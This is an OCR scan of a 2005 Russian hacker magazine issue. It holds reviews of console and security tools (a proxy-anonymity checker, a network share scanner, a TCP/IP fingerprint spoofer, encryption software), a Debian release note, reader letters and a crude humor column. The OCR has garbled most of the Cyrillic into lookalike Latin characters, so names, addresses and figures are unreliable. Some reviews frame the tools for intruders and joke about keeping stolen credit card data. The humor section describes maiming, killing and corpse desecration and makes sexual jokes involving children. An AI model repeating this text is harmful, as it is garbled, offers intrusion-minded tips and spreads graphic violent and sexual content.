дневной и ночной режимы, в зависимости от которых по-разно- 
му рассчитывается время. 

Каддіе ѵ 0.4.1 

Р08ІХ, ѴѴІпсІоѵѵз 

Зіге (в .дг): 261 КБ 

ѵѵѵѵѵѵ.гаддіе.огд 

Лицензия: МІТ/Х, ВЗР 



Раддіе — консольный 
ВЗЗ-агрегатор, напи- 
санный на РиЬу с ис- 
пользованием библи- 
отеки псигзез. Интер- 
фейс (помимо строки 
с текущим состояни- 
ем) составляют три 
панели: список РЗЗ- 
лент, заголовки от 
выбранного источни- 
ка и содержимое од- 
ного из элементов. 
При переходе к чтению одной из новостей и нажатии Епіег, вместо гад- 
діе в консоли, открывается Іупх с загруженным адресом, на который 
ссылался РЗЗ; после выхода из Іупх возобновляет свою работу гаддіе. 
Программа поддерживает разные версии РЗЗ, импорт/экспорт файлов 
в формате ОРМІ, интеграцию с Зупсіісв, а также НТТР-прокси и аутен- 
тификацию. Предусмотрена система закладок и настраиваемые при- 
вязки клавиш к действиям — работа в программе максимально упро- 
щена благодаря возможности выполнения многих операций нажатием 
одной кнопки (пометка сообщений как прочитанные/непрочитанные, 
добавление/удаление ленты, переключение между окнами и т.п.). При- 
сутствует поиск по содержимому текущей РЗЗ-базы, а также интегри- 
рована система нахождения РЗЗ-каналов в интернете по заданному 
запросу. Развита поддержка консольных параметров при запуске при- 
ложения: через них можно, например, просматривать и редактировать 
список каналов. Помимо интерфейса на базе псигзез, идет разработка 
и ѵѵеЬ-версии, но пока данная реализация находится в стадии бета. 

сІагкИНрсІ V 1 .2 

*ВЗР, Цпих, Зоіагіз 

Зіге (в .Ьг2): 15 КБ 

Іі1ф://сІтг.а{Іі.сх/пеі/сІагкІіНрб 

Лицензия: ВЗР 



Слоган сІагкИІфсІ 
очень емко и точно 
отображает всю за- 
думку проекта: ѴѴбеп 
уои пееб ап МфсІ іп а 
Ішггу (когда вам 
срочно нужен бПрсІ). 
Данный ѵѵеЬ-сервер 
состоит всего из од- 
ного небольшого 
файла на Си, кото- 
рый готов к запуску 
сразу после компи- 
ляции. В качестве 

единственной обязательной опции требуется указание корневого 
каталога. Сервер сам создает списки находящихся в директории 
файлов (аналогично опции Іпбехез у АрасЬе), отображает только 
статичные НТМ к- доку менты (никаких СѲІ, РНР и т.п.), поддержива- 
ет НТТР-запросы СЕТ и НЕАР, соединения Кеер-АІіѵе, «частичное 
содержимое» (например, докачку файлов). В РгееВЗР и Ііпих ис- 
пользуется зепсйіІеО, а для РгееВЗР еще и ассерйіііег. Сервер авто- 
матически отбрасывает бездействующие подключения. Есть функ- 
ция легирования всех запросов, ограничение максимального числа 
о подключений, сбгооі, защита от поддельных запросов о При за- 
§ пуске также можно задать номер порта, ІР-адрес (если на машине 
ш несколько сетевых интерфейсов), загружаемую по умолчанию 
^ главную страницу каталога (іпсІех.МтІ), цісі и дісі для процесса, 
^ файл с перечнем типов МІМЕ. 



Міпітит Ргоііі ѵ 3.3.14 

РОЗІХ, ѴѴіпсіоѵѵз 

Зіге (в .Ьг2): 265 КБ 

ѵѵ\л/ѵѵ.<гір1ісо.сот/зоЙ\л/аге/тр.Іі<тІ 

Лицензия: ѲМЦ ѲРІ 



Міпітит РгоІИ — 
текстовый редактор 
для программистов 
с интерфейсами 
псигзез (консоль- 
ный) и ОТК-і- (графи- 
ческий; поддержи- 
ваются ветки 1.2 и 
2.0). Обе версии ос- 
нащены возмож- 
ностью одновремен- 
ной работы с нес- 
колькими файлами 
и копированием час- 
тей текста из одного 
в другой (в консоли 
переключение осу- 
ществляется через 
список открытых в 
данный момент фай- 
лов, вызываемый по 
СІГІ-Ю, а в ОТКч- 
представлены и та- 
бы). Присутствуют 
стандартные функ- 
ции поиска по тексту 
и замены с регуляр- 
ными выражениями, быстрого перемещения по содержимому (к 
следующему/предыдущему слову, к заданной номером строке). В 
файл легко добавляется вывод произвольной консольной команды, 
а с помощью Ехесиіе есіііог Іипсііоп вызываются различные встро- 
енные функции редактора (увеличение/уменьшение размера 
шрифта, сортировка строк, просмотр лога и т.п.). Программистам 
же предлагается подсветка синтаксиса для наиболее популярных 
языков (С/С-Н-, РегІ, РНР, ЗііеІІ, ВиЬу, Руіііоп и др.), система тегов 
(для работы с функциями и переменными в коде программы) и спе- 
циальная помощь: например, при редактировании РѳгІ-скрипта на- 
жатие на Р1 при оставленном на какой-то функции курсоре приво- 
дит к вызову справки по ней из регібос. Кроме того, поддерживают- 
ся шаблоны для документов и защита файлов по паролю (исполь- 
зуется алгоритм АВСРОкІВ). 



088 Кеіеазе Оідезі: 

ОеЬіап 3.1 "8агде" 

Этого релиза ждали почти 3 года, его неоднократно откладывали, 
но проект ОеЬіап наконец-то представил новую стабильную версию 
своего популярного Ііпих-дистрибутива — ОеЬіап ОМи/кіпих 3.1 под 
кодовым названием Загде. ОеЬіап 3.1 занимает объем двух ОѴО 
(или 14 СО), и помимо значительного (I) обновления всех входящих 
в дистрибутив пакетов, создателями была проведена колоссальная 
работа над улучшением многих компонентов системы. Так, напри- 
мер, разработан «интеллектуальный» инсталлятор, обладающий 
модульной структурой и автоопределением устройств. Впервые в 
набор пакетов вошел открытый офисный пакет ОрепОЯІсе.огд, а 
также в ОеЬіап 3.1 появились первые результаты работы дочерних 
проектов ОеЬіап-ЕсІи/ЗкоІеІіпих, ОеЬіап-МесІ и ОеЬіап-АссеззіЬІШу. 

Из других релизов: ВосЬз 2.2, КОЕ 3.4.1, Рігеіох 1.1 Оѳег Рагк 
АІрЬа 1 и ТЬипсІегЬігсі 1.1 АІрЬа 1, ОеЬіап З.Огб, Хапбгоз Визіпезз 
Оезкіор 3.0, ИНЕЕ 4 Орсіаіе 1, Ребога Соге 4, РНР 5.1 Веіа 1, 
СепЮЗ 4.1 , ОЫО/00 3 2005, ОТК-н 2.7.0, КОІІІсе 1 .4, ОрепРКО 2.4, 
КНОРРІХ 4.0, 014.0. 















АсІѵапсесІ 

АсІтіпізІгаІіѵеТооІз 5.81 

ЗНагеѴѴаге 

Зіге: 2.91 Мб 

ѵѵѵѵѵѵ.дІоскзоД.сот 

АсІѵапсесІ Асітіпізігаііѵе Тооіз представляет собой отличный набор 
утилит для системного администратора: удобный сканер портов, 
продвинутый Ігасегоиіе, ѵѵМоіз-сервис. Однако наибольший интерес 
представляет тулза Ргоху Апаіугѳг. Признаться, это самая наворочен- 
ная, быстрая и удобная программа для проверки прокси- и сокс-сер- 
веров, которую я только видел. Работать с утилитой — одно удоволь- 
ствие. Прокси-серверы можно без труда ввести вручную или же им- 
портировать из файла. При этом прога самостоятельно отфильтрует 
некорректные ІР-адреса и удалит повторы. Объем прокси-листа для 
Ргоху Апаіугег — неважен. Он с легкостью «слопает» как небольшой 
файл, так и огромный список, состоящий из десятка тысяч записей. 
Подобно многим другим программам, Ргоху Апаіугег использует много- 
поточную проверку, причем нужное количество потоков и время тайма- 
ута можно установить вручную. Процесс сканирования при необходи- 
мости может быть приостановлен и позже продолжен в любое время. 
Самый же смак программы заключается в специальной градации прок- 
си-серверов, определяющей степень их анонимности. Благодаря спе- 
циальным обозначениям сразу становится ясно, как прокся является 
прозрачной (продолжает светить твой ІР-адрес), какая — анонимной 
(прячет ІР, но выдает своей присутствие), а какая сохраняет полную 
анонимность (так называемые элитные прокси). В последнем случае 
удаленный компьютер даже не подозревает, что имеет дело с клиен- 




том, работающим через ргоху — для него это обычное пользовательс- 
кое подключение. Все результаты проверок наглядно представлены в 
виде информативной таблицы, в которой особое внимание нужно уде- 
лить полю «рейтинг». Для каждого тестируемого сервера Ргоху Апаіугег 
определяет рейтинг анонимности, рассчитываемый по результатам 
анализа типа прокси, время скорости, поддержки РТР/331. Проксями с 
рейтингом 100 и выше можно пользоваться без опаски. 
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8ИагеЕпит 

РгееѴѴаге 

ЗІ2ѳ: 35 Кб 

ѵууѵѵу.вувіпІегпаІз.сот/ШІІИІез/ЗІіагеЕпит.ЬітІ 



л 



Каждый пользователь знает, что такое общие ресурсы (шары). 
Каждый второй считает необходимым расшарить весь винт, вклю- 
чая системные диски — это аксиома :). Разработчики ОС издавна 
пытаются обезопасить пользователя от подобных глупостей. Так, 
еще во времена ѴѴІпсІоѵѵз 9х/Ме юзер мог установить пароль на рас- 
шаренные ресурсы и тем самым ограничить к ним доступ, однако, 
обойти такую защиту можно было за несколько минут. В 
ѴѴІп2к/2003/ХР контроль над общими ресурсами значительно ужес- 
точился. Каждому объекту файловой системы отныне задается спе- 
циальный список управления доступа (Ассезз Сопігоі Іізі — АСЦ, в 
котором пользователь вправе обозначить политику безопасности. 
То есть конкретно указать, какие пользователи и какой доступ име- 
ют к данному сетевому ресурсу. 

Как показала практика, и здесь можно найти изъян. Во-первых, 
функция АСІ по умолчанию отключена и пользователям приходит- 
ся довольствоваться упрощенной системой создания сетевых па- 
пок. А во-вторых, грамотно прописать права под силу далеко не 
каждому (это все оттого, что они не читали статью «Безопасные 
шары» в #65 номере X). Поэтому полакомиться вкусными шарами 
злоумышленник может и сейчас, особенно если получит доступ в 
какую-нибудь корпоративную сеть. 

Среди массы утилит для поиска открытых ресурсов, особенно вы- 
деляется прога ЗИагеЕпцт. Фишка заключается в том, что она не 
только ищет (и даже — находит) открытые ресурсы, но еще и пока- 
зывает установленные на них права доступа, уполномоченных на 
чтение и запись пользователей. 

Используя МеіВІОЗ, ЗМагеЕпигп сканирует все компьютеры внутри 
текущего домена — для каждого из них отображается список сете- 
вых ресурсов и текущие политики безопасности. Незаменимый 
инструмент, если нужно найти брешь в безопасности, использовать 
или, напротив, устранить ее. Единственная проблема — нужны пра- 
ва администратора домена. Оно и понятно — полномочия для чте- 
ния АСЕ имеет только он. 

Г57.ВР — Вгокеп Ріпдегз 1.2 

РгееѴѴаге 

Зіге: 205 Кб 

гзіѵоіб.гц 




СМ 

ІО 



Не секрет, что неко- 
торые сканеры безо- 
пасности вроде не- 
безызвестного птар'а 
умеют определять тип 
и иногда даже вер- 
сию ОС, установлен- 
ной на удаленной ма- 
шине. Все они рабо- 
тают по одному и то- 
му же принципу сня- 
тия отпечатков ТСР/ІР 
стека (так называе- 
мый ОЗ Ріпдегргіпі). 
Большинство операционных систем имеет сугубо индивидуальные 
параметры настроек ТСР/ІР, поэтому для определения типа и вер- 
сии ОС достаточно просто считать их удаленными с машины и про- 




бить по заранее подготовленной базе. 

Напрашивается вопрос — чем же тогда занимается обозначенная 
утилита? Все просто: г57.ВР позволяет предотвратить подобного 
рода сканирования. Конечно, полностью остановить сканеры не по- 
лучится, но зато сбить их с толку можно без труда. Для этого доста- 
точно лишь подделать сигнатуры ТСР/ІР протокола, что без труда 
реализуемо с помощью г57.ВР. Для использования утилиты доста- 
точно выбрать тип подставной системы (например, РгееВЗО 5.0), 
нажать на кнопку Арріу и уйти в ребут. 

Единственное учти — злоупотреблять с подделкой параметров 
ТСР/ІР не стоит. И хотя в базу программы включены сигнатуры 
ѴѴІпбоѵѵзЭх, использовать их не рекомендуется. Параметры ТСР/ІР 
в этих СС были настолько плохо оптимизированы, что могут при- 
вести к ухудшению связи, в особенности, СіаІ-ЕІР соединений. 

81едапо5 8есигі1у 8иі1е 7.1.6 

ЗМагеѴѴаге 

Зіге: 13,7 Мб 

ѵѵѵѵѵѵ.зіедапоз.сот 



Безопасность пре- 
выше всего. Я, ко- 
нечно, не спорю: мож- 
но взламывать сер- 
веры без прокси, 
хранить в открытом 
виде базы краденых 
кредиток и инфор- 
мацию о банковских 
аккаунтах, но отве- 
чать за подобную ха- 
латность будешь толь- 
ко ты. Значительно 
обезопасить себя помогут системы сокрытия и шифрования дан- 
ных. На фоне многих совершенно одинаковых и серых утилит хо- 
чется выделить пакет Зіедапоз Зѳсигііу Зиііе. Эта программа под- 
держивает криптование данных «на лету», сохраняя их на вирту- 
альном шифрованном диске. Процесс шифрования происходит 
очень шустро, поэтому ни коим образом не влияет на работу в сис- 
теме. Ты просто обращаешься к данным, как если бы они лежали 
на обычном разделе жесткого диска. При этом не надо опасаться 
за сохранность информации. Даже если компьютер зависнет, или 
произойдет временное отключение электропитания, защитный ме- 
ханизм программы предотвратит потерю информации. Любой 
шифрованный диск может быть спрятан в системе всего одним 
кликом мыши. При этом расшифровать данные, не имея ключа, по 
сути, невозможно. Все потому, что Зіедапоз Зесигііу Зиііе исполь- 
зует алгоритм АЕЗ с использованием 128-битного ключа, славя- 
щийся своей криптостойкостью. 

Уникальной возможностью пакета является поддержка стеганог- 
рафии. Утилита позволяет скрывать зашифрованные данные лю- 
бого типа в файлах .ВМР и .ѴѴАѴ. Используется довольно слож- 
ный алгоритм, изменяющий ЕЗВ (Ееазі Зідпііісапі ВІ1 — младший 
бит) единицы информации. Получается, что на каждые 16 битов 
оригинального файла приходится 1 бит скрытой информации: 
происходит изменения только одного из 16 битов, 15 остальных 
остаются точно такими же. Естественно, разработчики позаботи- 
лись, чтобы применение подобной технологии не влияло на каче- 
ство воспроизведения ѴѴАѴ и отображения ВМР-файлов. На 700 
меговом СО можно скрыть более 40 Мб информации, что являет- 
ся отличным показателем. 
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Примеры взлома 
Протекторы и упаковщики 
Обход Ьгеакроіпі'ов 
Антиотладка 




ВЕСЬ 



СОФТ 



ИЗ 



ЖУРНАЛА 



ПОЛЕЗНЫЕ 



ПРОГРАММЫ 



ДРУГИЕ 



ПРИЛАГАЕМОМ 



НА 



МУЛЬТИЗАГРУЗОЧНОМ 



СВ 




[хакер 08 [ 80 ] 05 > ЮНИТЫ 154 ] 




I 



!• 




РАЗМЫШЛЯЛ Я ТУТ В РЕДКИЕ ЧАСЫ 
ДОСУГА О ТОМ, КУДА КАТИТСЯ НАШ 
МИР. ГЛОБАЛЬНО РАЗМЫШЛЯЛ, 
ОПЕРИРУЯ ПЛАНЕТАРНЫМИ МАСШ- 
ТАБАМИ. ПРИШЕЛ К СОВЕРШЕННО 
НЕУТЕШИТЕЛЬНЫМ ДЛЯ ВСЕГО 
ПРОГРЕССИВНОГО ЧЕЛОВЕЧЕСТВА 
ВЫВОДАМ: ЦЕНЫ НА ВСЕ ПОДРЯД 
РАСТУТ, КОМП ГРЕЕТСЯ, АМЕРИ- 
КАНЦЫ ПЛАНИРУЮТ ЗАПУСТИТЬ НА 
ОКОЛОЗЕМНУЮ ОРБИТУ РЕКЛАМ- 



НЫЕ ЩИТЫ, ЧТОБЫ ИХ РЯДОМ С ЛУ- 
НОЙ РАЗМЕЩАТЬ, ИЗ ТЕЛЕВИЗОРА 
ГАДЯТ НЕПОСРЕДСТВЕННО В МОЗГ 
БОГОМЕРЗКИМИ «ПЕСТНЯМИ», НА 
УЛИЦЕ ЖАРА И ПУХ, А ГЛАВНОЕ — Я 
УЖЕ СТО ЛЕТ НЕ ПОЛУЧАЛ ОБЫЧ- 
НЫХ ТАКИХ, БУМАЖНЫХ, АНАЛОГО- 
ВЫХ, ЧТО НАЗЫВАЕТСЯ, ПИСЕМ. А 
ВЕДЬ ОЧЕНЬ ХОЧЕТСЯ. БРАТЦЫ, 
ВОЙДИТЕ В ПОЛОЖЕНИЕ, ПОРА- 
ДУЙТЕ СТАРИКА ХОТЬ ОТКРЫТОЧ- 



КОЙ КАКОЙ, ЧТОБЫ ПОЧЕРК НА НЕЙ 
БЫЛ ЧЕЛОВЕЧИЙ И ВИДЫ С ДРУГОЙ 
СТОРОНЫ КРАСИВЫЕ. ВЕК ВАМ 
ЭТОГО НЕ ЗАБУДУ, ЧЕСТНО! НУ А 
ПОКА ПРИМЕМСЯ ЗА ЧТЕНИЕ ВА- 
ШИХ БОДРЫХ ЭЛЕКТРОННЫХ ПОС- 
ЛАНИЙ. СЕЙЧАС Я ВОДРУЖУ НА 
БАШНЮ ПРОЛОЖЕННУЮ ФОЛЬГОЙ 
ШАПЧОНКУ И, ПОКРЯХТЫВАЯ, ОТК- 
РОЮ ПЕРВОЕ ПИСЬМО, ПРИШЕД- 
ШЕЕ ЭЛЕКТРИЧЕСКОЙ ПОЧТОЙ... 



Ргот: г8Іат@таіІ.ги 
8иЬі: ][акег Ви1е2гг 

Ну наконе-то я написал вам! Ну ладно пару заметок по вашему журналу: Первое 
журнал мне ваш нравится и даже очень вот только рубрику Хумор можно 
убрать уж больно там воякой ерунды пишут, зачем забивать такого крутого 
журнала каким-то хламом ;-). Второе я линуксоид и все статьи из рубрики 
иМІХОЮ я перечитываю по десять раз но вот одно конечно там не хватает :( а 
именно Ыпих РАО было бы ваще полный Р1и!е2ггг...!!1 Третье конечно ОѴВ это 
очень хорошо даже очень но все же еще круче было бы двухстороняя ОѴО, 
тогда можно впихивать целые Ыпих дистрибы и даже очень а сколько бы софта 
там было... можно мечтать и мечтать. Четвертое наверно самое главное мне не 
нравится ваш новый вид журнала старый был как-то круче и удобнее на много, 
лучше наверно поменять РІТМВ менюшку ваще диска. Вообщем давайте ребята 
работайте удовлетворите желание пользователя ;-). Ваш покорный читатель 

РЕ: Дорогой наш покорный читатель! Спешу сообщить, что нам тоже очень 
нравятся те, кому нравится наш журнал. И еще больше нам нравится 
получать письма с конструктивными предложениями. Все замечания я 
обязательно доведу до сведения компетентных лиц (слышите, вы, читатель 
вам предлагает взяться за ум!), а вот по поводу Хумора... Не все там так 
просто. Сам же понимаешь, дружному авторско-редакторскому ([-коллективу 
тоже ведь надо где-то искрометно шутить, поэтому и спец-рубрику завели. 
Смешную. Я и сам иногда до слез начитаюсь и сижу. Так и живем... 

Ргот: 8егдіи2@уапсІех.ги оп ЬеІіаІІ оі 8егдіи2 
[8егдіи2@уапсІех.ги] 

8иЬі: Обидно! 

Здравствуйте редакция самого-самого и т.д. и т.п. Все это повторялось 
неоднократно (и похоже под копирку), поэтому пропущу. Перехожу к 
основной теме. Дело в том, что я с Украины и журнал ваш люблю и читаю 
давно и с пользой (как и многие украинские ламеры, юзеры, крякеры, 
хакеры и т.д.). Тем более обидно видеть в журнале оскорбительное для 
дюбого украинца олово «хохол». Это слово я встречал в журнале и ранее, 
но последней каплей стал ?6 за июнь 2005, стр. 135, «Вевлиотека 

программиста», фраза «Хохлы заколбасили ». Я, конечно, не 

настаиваю, но хотелось бы увидеть на страницах журнала извинения в 
адрес украинских читателей. Желательно без стеба. До свидания. 

З.Ь!. А в общем контент журнала без нареканий. Так держать! 

РЕ: Зегдіи2, родной! Всячески сочувствую тебе, понимаю твою 

озабоченность и разделяю ту обиду, каковую вызывает «оскорбительное 
для любого украинца слово». Понятно, что никто не хотел бы обижать 
наших украинских друзей, просто это проклятые москали начинающих 
авторов подучили. Но им нас не поссорить! Зегдін2, прости нас, мы так 
больше не будем. Без стеба, по-взрослому. И заодно, пользуясь случаем, 
передаю пламенный привет своему киевскому товарищу Ярику. Хотя, 
честно говоря, вот конкретно он — хохол щирый :). 



Ргот: Затеряный Среди Вас [ 28 ѵ-Ьк@ІІ 8 І.ги] 

8иЬ]: Креатифф прямо-таки прет 

Доброе время суток, многоуважаемая редакция! 

Перейду сразу к делу, а дело заключается в том, что у меня имеется 
несколько рассказов, которые вполне бы могли заполнить собой вашу 
рубрику «Креатифф», буду безмерно благодарен и рад если вы 
согласитесь их напечатать! 

С уважением Не:асЮг 

Р.З. Очень прошу это письмо не публиковать (особенно в разделе «самое 
дурацкое письмо месяца» :)) 

НЕ: Ку, ВеіасЮг! Начну отвечать с конца: письмо твое, как сам видишь, 
публикуем, где ты просил, то есть — где надо. По поводу рассказов и еще 
всякого другого устного народного творчества читателей пишу в очередной 
раз КРУПНЫМИ БУКВАМИ: мы ВСЕГДА рады получать от вас всех не 
только тычки, пинки и виртуальные затрещины, но еще и связные тексты, 
посвященные тематике ][. Для того, чтобы получить ожидаемый приятный 
результат и заслуженный гонорар, сделать надо не так уж и много: 

О] Убедиться в том, что не написать желаемое ты уже никак не можешь. 
Само пишется, и все тут. 

[Ц Убедиться в том, что написанное тобой раньше никем написано не было. 

0 Таки написать. 

[З Прочесть самому и дать почитать товарищам, которые «в теме». 

[3 После исправления всех смысловых ошибок и учета пожеланий, 
определиться, в какую рубрику ][ предназначается готовый текст и 
зарядить его окончательный вариант сначала в спелл-чекер, а потом сразу 
же отправить электрической почтой в редакцию. 

@ Ждать славы и веселых золотых баблонгов. 

Р.З. План проверенный, работает. Я сам так когда-то начинал :). 

1 САМОЕ ТОЛКОВОЕ ПИСЬМО НОМЕРА I 

Ргот: Эдик [есІік-х@гатЫег.ги] 

8иЬ]: Просьба 

Извените за не скромный вопрос, но ваш журнал пришел ко мне со 
сломанным диском. Не будете ли вы так любезны выслать ОѴО диск по 
новой. Буду очень благодарен. С уважением Вопез. 

ВЕ: Здравствуйте, дорогой Эдуард. Большое спасибо за Ваше сообщение, в 
связи с накопившимися у Вас вопросами, хотел бы внести в них ясность. 
Сломанный диск, прилагающийся к вышеуказанному журналу, — есть продукт 
трудовой деятельности так называемых хакеров, днями и ночами ломающих 
все подряд, в том числе и диски. Я лично читал в одном журнале, что сломать 
□ѴО-диск не очень-то и просто, но некоторым все же удается. А потому (ну и 
чтобы два раза не вставать), предлагаю объединить и диск (не сломанный, 
ломать будешь сам), и заслуженный приз от нас всех. Приз запустится и так, 
безо всяких взломов. Не переусердствуй :). Да, не забудь отписать точнее, 
какой там у тебя диск-то был, а то пришлем какой попало :) @ 



С уважением и наилучшими пожеланиями, Е-МАІЬСОММЕМТЕВ 

Сепіпег (сеп1пег@пеа1.хакер.ги) 
ѵѵтѵ.сепіпег.ік 
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ОДНАЖДЫ Я БЫЛ МАЛЕНЬКИМ. И Я ПОСТОЯННО ЗА- 
НИМАЛСЯ ЭТИМ В БАССЕЙНЕ. БЫВАЛО, СОБЕРЕТ 
ТРЕНЕР ВСЕХ В ОДНОМ КОНЦЕ БАССЕЙНА, А Я ПЛЫ- 
ВУ В ДРУГОЙ. И, ОСТАВАЯСЬ НАЕДИНЕ С СОБОЙ, УБ- 
ЛАЖАЛ СЕБЯ РУКОЙ. НО ОДНАЖДЫ МЕНЯ ПРОПАЛИ- 
ЛИ. ЗА ТУМБОЙ, ОТКУДА ПРЫГАЮТ, СПРЯТАЛАСЬ ДЕ- 
ВОЧКА. И ОНА СКАЗАЛА, ЧТО ЕСЛИ Я НЕ ПЕРЕСТАНУ 
ЭТО ДЕЛАТЬ, ТО ОНА ВСЕМ РАССКАЖЕТ. С ТЕХ ПОР 
Я ПЕРЕСТАЛ ЩУПАТЬ СВОИ СОСКИ 



зиРЕвнимЕв 

Ыаск_п1п]ака 
(Ыаок_п1п)ака @ таіі.ги) 




Однажды я был маленьким. И часто получал по ушам. Первый раз меня 
жестоко побили в лагере. В моем отряде был здоровый толстяк-кретин. 
Как-то раз он начал вспоминать свое прошлое: 

— Эх, помню, как одна девчонка учила меня целоваться... 

Я аж поперхнулся: 

— Г ы, да ты лось же! Хотел бы я посмотреть, что за дура такую жирную 
скотину смогла поцеловать. 

Я даже не успел подумать о том, чтобы бежать. 

Второй раз меня побили опять же в этом лагере и опять же этот толстяк. Он, 
кстати, скином был. И снова этот придурок вывел меня из себя. Я, не имея 
в виду ничего плохого, назвал его «евреем». У скинов, оказывается, по 
этому поводу комплексы на лицо, но на этот раз я даже попытался убежать. 

*** 

Однажды я был маленьким. Учился уже в школе. И был как-то раз у нас урок 
физкультуры. Все дети, как дети, а один упыреныш совсем молчаливый стоит. 

— Чего ты тут один грустишь, друг? — спросил я. Ответом мне была 
лишь тишина. 

Ну и решил я его развеселить. Снова говорю ему: 

— Вот стой так и не двигайся, сейчас прикол покажу. 

Затем поднимаю с земли камень и прицеливаюсь чуть выше макушки. В 
общем, не получилось мне запустить камень так, чтобы он пролетел в 
миллиметре от головы. Но все равно история закончилась хорошо — 
«скорая помощь» увезла парня о вытекшим левым глазом. 

*** 

Однажды я был маленьким. И играл я во дворе о ребятами в баскетбол. Когда 
во время игры кто-нибудь толкался, эти чмошники кричали: «Фол! Фол! 



Свободный удар!». Если же меня кто-нибудь пинал, я лишь тихо бормотал: 
«Ну все, падла! Сейчас, только еще раз встретимся!». 

Да, много тогда ребят в больницу положили. Мы им печенье и фрукты носили. 

*** 

Однажды я был маленьким. Жил я, стало быть, в деревне у бабушки. А 
деревня, надо сказать, что надо: дома кирпичные, телевидения местные. И 
вот как-то я совершенно случайно оказался в центре телесъемки. На самом 
деле, я сидел на заборе и думал о своем. А все внимание зевак было 
направленно на некое культурное здание. 

Но я так сильно думал на этом заборе, что аж долбанулся об землю. 
Встав, и грязно выругавшись, я покинул сие злачное место. Вечером 
уселись всей семьей перед телевизором: «...сегодня в таком-то здании 
было то-то и то-то...» В конце крупным кадром показывают меня. Затем 
падение. «Ай, твою мать, подонки, чтоб вас апильсец! Оперный енот!», — 
донеслось из кадра. Репортаж оборвался, а ведущий новостей 
покраснел. Вот смеху-то было. 

*** 

Однажды я был маленьким. И решил я денег заработать. Подхожу к брату 
и предлагаю поспорить на 1 млн долларов, что у меня при себе нет денег. 
Баран проверил мои карманы и согласился. Я радостный достал из носков 
и трусов купюры и мелочь. 

Миллион он почему-то сразу отдать не смог, но пообещал, что скоро 
обязательно вернет все до цента. Само собой, я этого хлыща на проценты 
поставил, чтобы не расслаблялся. 

В данный момент ищу выбивал долгов, ибо не торопится подлец 
миллионером становиться. 
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*** 

Однажды я был маленьким. Познакомившись поближе с этим жестоким 
миром, мне, естественно, пришлось написать теорию «Недобздения и 
перебздения». Вот ты бросаешь мячик в кольцо. Ты либо недобздишь, либо 
так перебздишь, что лучше бы вообще не бздел. Или, например, драка. Тут 
ты либо забздишь соперника до смерти, либо сам пожалеешь о своем 
недобздении. Та же ситуация с девушками, выпивкой и прочим. 
Единственная проблема с прямым смыслом слова «бздение». Ну, впрочем, 
кому оно нужно? 

*** 

Однажды я был маленьким. Жить приходилось в замечательной квартире. 
Ну, то есть, ночевать в одной кровати с потными жучками, паучками и 
тараканчиками — это в порядке вещей. Ну, так вот. Насмотревшись 
фильмов про пауков-убийц, я составил план. Затем пошел в ближайший 
потолочный уголок и взял на учет самого жирного паучка. Вооружившись 
мухобойкой, я потопал на охоту. Через час у меня уже было ведро мух. 

— Кушай, кушай мой сладенький! — приговаривал я, кидая в паутинку по 
щепотке сухих мух. 

— Спасибо, хозяин! — жуя с набитым ртом, молвил паучок. 

Я его называл Леня. Но паучок делал сердитые глаза и исправлял: 

— Леонид! Ты понял? Леонид, и никак иначе! 

— Хорошо, — соглашался я, — Леонид, ты, главное, кушай... 

В общем, через пару недель в моем распоряжении был собственный паук - 
убийца размером о большую кошку. И стали меня все уважать. Еще бы! 
Паук-мутант — это вам не шубу в трусы заправлять. В школе меня даже 
называли Магистром Членистоногих. Идиоты, блин. Но как-то раз этот 
Леня-сукин-сын меня укусил. С тех пор я — Человек-Паук. Вы думаете, это 
классно? На самом деле, эта фигня очень сильно подействовала на мою 
психику — 10 лет всего лишь, а я как имбецил по крышам окачу, да мир 
спасаю. 

К данному моменту я вообще устал как скот. Никакой личной жизни. 
Остается лишь мечтать о мирной жизни и счастливой семье с девочкой, 
которая не носит трусиков. 

Однажды я был маленьким. Пошел я как-то с девушкой погулять. Мы шли 
по набережной, взявшись за ручки. Кругом восходил закат. Солнце только 
вставало, а луна уже появилась. Были огромные волны, но на воде стояла 
полная тишь. 

— Эй, детка, — услышал я голос своей подруги, — а поцелуй меня туда! 

— Туда?! — сделал я округлые глаза. 

— В шею, извращенец. 

— А, ну в шею можно. Оголяй свою шейку, пингвинчик ты мой, — игриво 
сказал я. 

Запрокинув голову и опустив вниз воротник, она застыла и закрыла глаза. 
Сначала я прикоснулся к юному женскому сладкому тельцу губами, затем 



зубами. Затем открыл по максимуму челюсть и как куснул! Раздался 
пронзительный крик. Затем, убрав от нее голову, я выплюнул на землю 
здоровый кусок кожи с мясом. И снова прильнул устами к ее шейке. Еще 
укус! Еще! Вот уже голова соединена с телом одним позвонком! Но я 
обсасываю и его! 

Через пару минут я сидел на асфальте, а рядом окоченевал труп. 

— Что ж я делаю? Такой возможности упускать нельзя, — с этими словами 
я покосился на тело, встал и., хм., жестоко надругался над трупом. 

Вот потому я сейчас и работаю в морге. 

А вы где работаете? 

*** 

Однажды я был маленьким. Учился, как все, во втором классе. И была у 
нас по физкультуре невероятно милая женщина. Где-то два на два метра, 
не меньше трехсот кило. И прозвище такое смешное — «Груша». И вот 
пришли мы, маленькие невинные детки, в бассейн. А что? Мы же не знали, 
что она тоже купаться будет, да еще и о трамплина прыгать. 

В общем, сиганула эта секс-бомба в водичку, детишек моментом вынесло 
на берег, брызги выбили стекла в здании и все такое. 

Ну, я быстро в бега оттуда. Домой прихожу, сестричка интересуется 
делами. Пришлось, как всегда, чуть-чуть приврать: 

— Прикинь, Г руша в бассейн как сиганула, так лифчик аж соскочил, гыыы! 
Ну как сказал об этом, так и забыл. 

На следующий день в школу прихожу, слышу, какой-то парень другому 
говорит: 

— Прикинь, вчера Г руша в бассейне голая купалась. 

Через пару часов подслушал разговор девушек: 

— Вчера Груша прыгнула о трамплина, трусы и лифчик соскочили, на дне 
плитка потрескалась, и одного пацана насмерть приплющило. 

В конце дня какие-то ребята вообще сожгли: 

— Захожу в мужскую раздевалку. Вдруг один ящик трясется, я его 
открываю, а там Г руша сидит. И дрочит. 

МОРАЛЬ: 

Однажды одного мальчика в писюн укусила оса. На следующий день этого 
же мальчика снова укусила в писюн оса. Но уже другая. А другой мальчик 
на своем писюне обнаружил клеща. Через пару дней он побежал в 
больницу, но никому не разрешал прикасаться к своему члену. Так пацан и 
ходит до сих пор с клещом на письке. Еще несколько ребят обнаруживали 
клещей у себя на мошонке. Но быстро соображали и, несмотря на 
приятные ощущения, опускали свои достоинства в бензин. Клещи 
задыхались и вылезали. А один мальчик во время такого выманивания 
клеща курил. Пепла было много. А один мальчик переехал в США и пошел 
в их армию. Его отправили в Панаму и там, как-то переходя озеро, он 
решил пописать. Пока он писал, через письку в него забралось пару сотен 
